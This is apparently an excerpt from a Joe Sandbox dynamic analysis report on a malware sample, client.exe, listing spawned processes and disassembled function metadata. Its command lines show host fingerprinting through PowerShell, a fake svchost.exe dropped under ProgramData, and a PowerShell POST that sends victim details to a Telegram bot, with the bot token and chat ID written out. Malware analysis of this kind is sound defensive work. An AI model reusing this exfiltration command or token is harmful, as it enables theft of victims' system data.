                                    Commandline:"C:\Users\user\AppData\Local\Temp\client.exe"
                                    Imagebase:0x400000
                                    File size:29'830'891 bytes
                                    MD5 hash:0302EF4E965477DD225B298374C62722
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:Borland Delphi
                                    Reputation:low
                                    Has exited:false

                                    General

                                    Target ID:12
                                    Start time:19:05:13
                                    Start date:22/12/2024
                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                    Imagebase:0x7ff693ab0000
                                    File size:496'640 bytes
                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                    Has elevated privileges:true
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:13
                                    Start time:19:05:13
                                    Start date:22/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')"
                                    Imagebase:0x7ff6aa180000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:14
                                    Start time:19:05:13
                                    Start date:22/12/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')"
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:15
                                    Start time:19:05:17
                                    Start date:22/12/2024
                                    Path:C:\Windows\System32\svchost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                    Imagebase:0x7ff6eef20000
                                    File size:55'320 bytes
                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:16
                                    Start time:19:05:18
                                    Start date:22/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /c powershell -Command "$env:COMPUTERNAME"
                                    Imagebase:0x7ff6aa180000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:17
                                    Start time:19:05:18
                                    Start date:22/12/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:powershell -Command "$env:COMPUTERNAME"
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:18
                                    Start time:19:05:18
                                    Start date:22/12/2024
                                    Path:C:\ProgramData\svchost\svchost.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\ProgramData\svchost\svchost.exe" --run
                                    Imagebase:0x400000
                                    File size:187'392 bytes
                                    MD5 hash:A3027B4F632E949EF06C151BD8787FAF
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:19
                                    Start time:19:05:18
                                    Start date:22/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /c powershell -Command "[System.Environment]::OSVersion"
                                    Imagebase:0x7ff6aa180000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:20
                                    Start time:19:05:18
                                    Start date:22/12/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:powershell -Command "[System.Environment]::OSVersion"
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:21
                                    Start time:19:05:19
                                    Start date:22/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /c powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }"
                                    Imagebase:0x7ff6aa180000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:22
                                    Start time:19:05:19
                                    Start date:22/12/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }"
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:23
                                    Start time:19:05:20
                                    Start date:22/12/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ/sendMessage' -Method POST -Body @{chat_id='6734985705' ; text=' @New Device Infected!!!, Information: Date: 2024-12-22 19:05:51, Hostname: user-PC, OS: Win32NT 10.0.19045.0 Microsoft Windows NT 10.0.19045.0, Architecture: 64-bit, Public IP: 8.46.123.189'}"
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:81.2%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:7.1%
                                      Total number of Nodes:28
                                      Total number of Limit Nodes:1

                                      Callgraph

                                      • Executed
                                      • Not Executed
                                      • Opacity -> Relevance
                                      • Disassembly available
                                      callgraph 0 Function_00401000 1 Function_00401454 2 Function_00401515 5 Function_0040149F 2->5 3 Function_004013F8 4 Function_0040108C 4->0 5->1 5->3 5->4

                                      Executed Functions

                                      Function 00401515 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1776377178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1776240472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1776419175.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1776419175.0000000000E02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1776419175.0000000001802000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1780689929.0000000002113000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled__getmainargs__set_app_type_controlfpexitmemset
                                      • String ID:
                                      • API String ID: 3649950142-0
                                      • Opcode ID: fddfd64d8b5aefd74ad153516f8b941464f7e69bd4d2f90f46013ab7d764bdbf
                                      • Instruction ID: 3c8e69b404d224bd111db8ff9e82edf0fadbc0a0028c71c73d873c21c304bf4c
                                      • Opcode Fuzzy Hash: fddfd64d8b5aefd74ad153516f8b941464f7e69bd4d2f90f46013ab7d764bdbf
                                      • Instruction Fuzzy Hash: A2112AF5E01108ABDB00EEA8ED85F5B77FCAB08304F440876F908E7395E539E9548B64
                                      Function 0040108C Relevance: 38.8, APIs: 12, Strings: 10, Instructions: 257filestringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1776377178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1776240472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1776419175.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1776419175.0000000000E02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1776419175.0000000001802000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1780689929.0000000002113000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                                      Similarity
                                      • API ID: ExecuteShellmemset$_sleepfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                      • String ID: ! @$%s\%s$& @$+I$0I$1 @$;I$`!@$e!@$q!@
                                      • API String ID: 1922354721-1880397412
                                      • Opcode ID: 04023b4f7f159dbdbd247f6d720f9a89c23567e8f0ef296875ecf0059dfc6286
                                      • Instruction ID: 1614fec4931ac40d3dbbc9c782f718bc644d5ec47aefa4a3900000a3e7265933
                                      • Opcode Fuzzy Hash: 04023b4f7f159dbdbd247f6d720f9a89c23567e8f0ef296875ecf0059dfc6286
                                      • Instruction Fuzzy Hash: 909160F0E001049BEB14DBACDC45B9EB7B9EB48309F04417AF119FB391E7399A458B69
                                      Function 00401000 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 28 401000-40102e malloc 29 401031-401039 28->29 30 401087-40108b 29->30 31 40103f-401085 29->31 31->29
                                      APIs
                                      Strings
                                      • ,82j6jrg@l(]6w7qb&[md/9t!+4c!4(4, xrefs: 0040106E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1776377178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1776240472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1776419175.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1776419175.0000000000E02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1776419175.0000000001802000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1780689929.0000000002113000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                                      Similarity
                                      • API ID: malloc
                                      • String ID: ,82j6jrg@l(]6w7qb&[md/9t!+4c!4(4
                                      • API String ID: 2803490479-3771425235
                                      • Opcode ID: 446f45854d40204ef437e7581beecbac5af05db0ea9814f736cc0bd3468f7cd1
                                      • Instruction ID: 409a5696d0250f9201f031fd12ae07b0a586777b5eee21996a3197913471bdc8
                                      • Opcode Fuzzy Hash: 446f45854d40204ef437e7581beecbac5af05db0ea9814f736cc0bd3468f7cd1
                                      • Instruction Fuzzy Hash: 50110CB0A05648EFCB04CFACD4907ADBBF1AF49304F1480AAE856E7391D635AE41DB45
                                      Function 0040149F Relevance: .0, Instructions: 30COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 34 40149f-4014f2 call 4013f8 call 40108c call 401454
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1776377178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1776240472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1776419175.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1776419175.0000000000E02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1776419175.0000000001802000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1780689929.0000000002113000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                                      Similarity
                                      • API ID: memset$ExecuteShell_sleep
                                      • String ID:
                                      • API String ID: 3960281847-0
                                      • Opcode ID: c0d1ea09fbd6701a4c3629ec94d96e6aedb76f341777dfe886a638cbd10c4eb8
                                      • Instruction ID: 1f5071abf6ecdd4f9423a1b2bcd609ffcff24a3865080bdcb8f9b955b3f598f1
                                      • Opcode Fuzzy Hash: c0d1ea09fbd6701a4c3629ec94d96e6aedb76f341777dfe886a638cbd10c4eb8
                                      • Instruction Fuzzy Hash: 9BF0F8B4E00208AFCB40EFA8D981E8AB7F8AB48304F004469F958DB351E634EA948B54

                                      Executed Functions

                                      Function 04CCB570 Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Zm^
                                      • API String ID: 0-2396149090
                                      • Opcode ID: ac5925477d9a2503b3e57843d373d5dcaffa99ee0f079993bd52dd675ff0b09d
                                      • Instruction ID: e6ecf44cc8ec23eeb39f8261d66050359ceda02ff30f292b0a6b71ce414eea44
                                      • Opcode Fuzzy Hash: ac5925477d9a2503b3e57843d373d5dcaffa99ee0f079993bd52dd675ff0b09d
                                      • Instruction Fuzzy Hash: 91918070F006195BEB19EBB899116AEBBB3EFC4700B00892DD506AB358DF74AD058BD5
                                      Function 04CCB580 Relevance: 1.5, Strings: 1, Instructions: 252COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Zm^
                                      • API String ID: 0-2396149090
                                      • Opcode ID: 49d0d42aaa863011859849a888ad26afcf66c16a051d732be31d165bea893c85
                                      • Instruction ID: efaf50e2eb5a7ed9a96a78fe9baa8604723defb3aecc71c7cd89f921e52ed14f
                                      • Opcode Fuzzy Hash: 49d0d42aaa863011859849a888ad26afcf66c16a051d732be31d165bea893c85
                                      • Instruction Fuzzy Hash: 2E917E70F006195BEB19EBB899116AEBBF3EFC4700B00892DD506AB358DF74AD058BD5
                                      Function 07802308 Relevance: 15.8, Strings: 12, Instructions: 751COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1826959644.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7800000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'dq$4'dq$4'dq$4'dq$J*l$J*l$J*l$J*l$J*l$J*l$r)l$r)l
                                      • API String ID: 0-262702356
                                      • Opcode ID: 83059ca8ad09bffeff571681a938b1b6c6bbfc5b8b6004d0e12f9431097850ab
                                      • Instruction ID: 01be7445e01036180ac12749ee685b9e65fd595f9b661bf72160496c45960bb0
                                      • Opcode Fuzzy Hash: 83059ca8ad09bffeff571681a938b1b6c6bbfc5b8b6004d0e12f9431097850ab
                                      • Instruction Fuzzy Hash: BC4238B1B0020ADFCB648F698C1976ABBE2BF99315F14807AD905CB291DF71D845C7E2
                                      Function 07803CE8 Relevance: 5.6, Strings: 4, Instructions: 580COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1826959644.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7800000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'dq$4'dq$4'dq$4'dq
                                      • API String ID: 0-2296240322
                                      • Opcode ID: 6675e50e8a154a3eabd1583811f85ce208820f4bb3b9d4263f67e434055872fe
                                      • Instruction ID: e4d072f659ce3b5045edcd6447c460b0eaff83182ba84912631f0ce808df65a0
                                      • Opcode Fuzzy Hash: 6675e50e8a154a3eabd1583811f85ce208820f4bb3b9d4263f67e434055872fe
                                      • Instruction Fuzzy Hash: D0127BF1B002899FCB514A698C1176BBBA2AFE2315F14807ADA09DB6D2DB31DC45C7E1
                                      Function 04CC70A8 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (hq
                                      • API String ID: 0-4060669308
                                      • Opcode ID: d02829367c9ce4a1569cbde4cb99255ced2a4a309bc0aae8a13831758ee6db46
                                      • Instruction ID: 715100fdbd052beb818406bfff7eeb3b94d8c826b038e354f50e796b9f4746e3
                                      • Opcode Fuzzy Hash: d02829367c9ce4a1569cbde4cb99255ced2a4a309bc0aae8a13831758ee6db46
                                      • Instruction Fuzzy Hash: 03413A34B052058FDB15CF68C864AADBBF2EF8D351F1844A8E506AB391DA35ED41CF60
                                      Function 04CCAE18 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ]m^
                                      • API String ID: 0-2480367066
                                      • Opcode ID: 23011a7f0ee330ce923e4737d282e1ad07123787d168dc3308b9bb64f8cff6c7
                                      • Instruction ID: 0208a8244f4a0f5f18be05fae41916da7cf2f01a2f892f6e284974d204b18d6c
                                      • Opcode Fuzzy Hash: 23011a7f0ee330ce923e4737d282e1ad07123787d168dc3308b9bb64f8cff6c7
                                      • Instruction Fuzzy Hash: 9B3192B4A002499FDB05DF64D854ABE7BB3EF84300F2184A9D601AB3A5CE79AD01CF50
                                      Function 04CCB088 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (&dq
                                      • API String ID: 0-1586597270
                                      • Opcode ID: 9a847919500135d67f66d1a4809b2389faff07254e803a8073e76e2ff60d7ac9
                                      • Instruction ID: 65dcb85b82fa84f8b99fe0f3c88f8f3629aee4f1060cba5b401a2cc1e0350c7a
                                      • Opcode Fuzzy Hash: 9a847919500135d67f66d1a4809b2389faff07254e803a8073e76e2ff60d7ac9
                                      • Instruction Fuzzy Hash: 7921D371A002588FCB14DFAEE40479EBFF6EF88320F14846ED009A7340DA35A9058BA5
                                      Function 04CCAE28 Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ]m^
                                      • API String ID: 0-2480367066
                                      • Opcode ID: 52af9504f8f2b92429009289fe0a00a72579c2d2e1721ac1883d6865e321a6e8
                                      • Instruction ID: 7ffd6ed3d594582c3daeb178d1aa2ab93ec6da5449c000471244b2dcbecae7dc
                                      • Opcode Fuzzy Hash: 52af9504f8f2b92429009289fe0a00a72579c2d2e1721ac1883d6865e321a6e8
                                      • Instruction Fuzzy Hash: 793121B4A002099FEB04DF64D955ABE7BB3EF84300F6084A9D615AB3A5DE79AD018F50
                                      Function 078017B8 Relevance: .3, Instructions: 342COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1826959644.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7800000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 40b92f9289e283d8b8eb38a794ea0c5b083143a96b13e1ad81b2ae3d9e14414d
                                      • Instruction ID: 7e2293030acd7f1a49727fdc92613710698db4ee48188341e05948ff02b069b5
                                      • Opcode Fuzzy Hash: 40b92f9289e283d8b8eb38a794ea0c5b083143a96b13e1ad81b2ae3d9e14414d
                                      • Instruction Fuzzy Hash: F9B13AB2F0424D9FCB508F6DC81866EBBE2AF96321F18C06AD945CB291DB31D945C7E1
                                      Function 04CC29F0 Relevance: .2, Instructions: 211COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 86be3ab6a6f1a9b8b36421e133661a1dac416e57d5b78ccb2d5fbcf44cf0e3ea
                                      • Instruction ID: fdae960c61e3c6e4f4ab02218360b509f40a30257fd3cb146df68e585f3eb200
                                      • Opcode Fuzzy Hash: 86be3ab6a6f1a9b8b36421e133661a1dac416e57d5b78ccb2d5fbcf44cf0e3ea
                                      • Instruction Fuzzy Hash: B5916B74A002058FCB15CF9CC4949AEFBB2FF88310B2485A9D915AB3A5C735FD91CBA0
                                      Function 04CCBBB0 Relevance: .2, Instructions: 155COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 18713211a3f9f23955150bdeacdb82c1453f338ad9975ba1d913040ec47028f9
                                      • Instruction ID: f5ff376ae5fc260dc742d0818b0bc699064974169e70f82f80ec4ef274eeea4a
                                      • Opcode Fuzzy Hash: 18713211a3f9f23955150bdeacdb82c1453f338ad9975ba1d913040ec47028f9
                                      • Instruction Fuzzy Hash: A3611771E002489FCB14DFA9D584B8DFBF2EF88310F25816AE809AB354EB70AD45CB50
                                      Function 04CC7808 Relevance: .2, Instructions: 153COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7c3b64b0fe1b42a2fe6bb06d1baff62946f4e27fe899f68a08a07cb17373a5b1
                                      • Instruction ID: f86903b8bf5a4560dd195ba74fe045985f7f938ddb4eaef5db0b8006d85b640e
                                      • Opcode Fuzzy Hash: 7c3b64b0fe1b42a2fe6bb06d1baff62946f4e27fe899f68a08a07cb17373a5b1
                                      • Instruction Fuzzy Hash: 5C51AC347002169FDB049B79D854A6A7BE7FFC8354F2484A9E60ADB355EB35EC01CBA0
                                      Function 04CCBBA0 Relevance: .2, Instructions: 151COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0c6a3e053be41a9875ff54654c650201a6bdf5e120d7dafdb87099562edc721e
                                      • Instruction ID: 68790e4cbb46cd4cbcc2a8d5dfea920e5fd1c3fb0a0154efe0e5501135f37fbc
                                      • Opcode Fuzzy Hash: 0c6a3e053be41a9875ff54654c650201a6bdf5e120d7dafdb87099562edc721e
                                      • Instruction Fuzzy Hash: CE510971E002489FCB54DFA9D585A8DFBF2FF88310F15816AE819AB364EB30AD45CB50
                                      Function 04CC7081 Relevance: .1, Instructions: 123COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 480184968ff975dfb61fdfc1673b3758e63428eb7e3419a9f36dd96ff2d604b7
                                      • Instruction ID: 4989d7db5bfff7229ca3f7681f1ea70db75634e6a53dd544b988c78355ef7e87
                                      • Opcode Fuzzy Hash: 480184968ff975dfb61fdfc1673b3758e63428eb7e3419a9f36dd96ff2d604b7
                                      • Instruction Fuzzy Hash: 6A419234A052468FCB05CFA9C8549A9BBF2EF8A315F19449DE405EB3A1DB31ED41CF60
                                      Function 04CC2B00 Relevance: .1, Instructions: 110COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: acdc00023c0e7aa1a4fefe25ac7a26a599f7f7fd766ac054eddff4d08e155df0
                                      • Instruction ID: 761749a6a6e3414f7d25bb3a237a738565465959039fe416c79edfd6bd2ee990
                                      • Opcode Fuzzy Hash: acdc00023c0e7aa1a4fefe25ac7a26a599f7f7fd766ac054eddff4d08e155df0
                                      • Instruction Fuzzy Hash: 37414CB4A005059FCB06CF58C4D89AEFBB2FF48310B2585A9D915AB365C736FD91CBA0
                                      Function 07803CE7 Relevance: .1, Instructions: 110COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1826959644.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7800000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 04d39a8d215a03366e6d16ae97263be711e850c9b90c4d4b21fb4e99d3422a73
                                      • Instruction ID: 77cf04ed5b707ea46627721bf239c3e85a3a97687de0ad73f0f92580fb80ae1e
                                      • Opcode Fuzzy Hash: 04d39a8d215a03366e6d16ae97263be711e850c9b90c4d4b21fb4e99d3422a73
                                      • Instruction Fuzzy Hash: DA31D1F1A00206EBCBA08E29CD0567BBBB2AFA0648F14816DDD04DBAD5D731EC44C7E1
                                      Function 04CCC478 Relevance: .1, Instructions: 101COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0575a2b621c121bf3f07bebb8ae5dcaba7e78835bbe5d81a29fb67b975877296
                                      • Instruction ID: 5c719b583226fc8a8c5a532b5534abb93446ff21a90e1b5321fd7b6df60ed1b4
